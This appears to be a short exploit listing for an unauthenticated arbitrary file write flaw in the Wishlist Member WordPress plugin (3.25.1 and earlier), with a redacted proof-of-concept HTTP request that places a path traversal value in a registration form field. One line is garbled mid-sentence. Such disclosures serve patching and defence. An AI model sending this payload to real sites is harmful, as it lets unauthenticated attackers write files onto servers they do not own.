Share
## https://sploitus.com/exploit?id=7C2550AB-0D0A-589C-8530-48A11363C756
## ๐Ÿ“„ Overview

This repository contains a detailed analysis of an **Unauthenticated Arbitrary File Write** vulnerability discovered in the **Wishlist Member** plugin for WordPress.

- **Affected Versions**: Version `3.25.1` and all earlier versions (i.e., ` Note: Sensitive paths and server-specific data have been redacted.

---

## ๐Ÿงฐ Proof of Concept (POC)

```http
POST /path/to/register HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

transient_hash=../path/to/file.php&orig_email=
```

## Note
This vulnerability was discovered in Wishlist Member version 3.25.1 and earlier. 
It has been patched by the vendor in a later release. No CVE ID has been assigned to this issue as of now.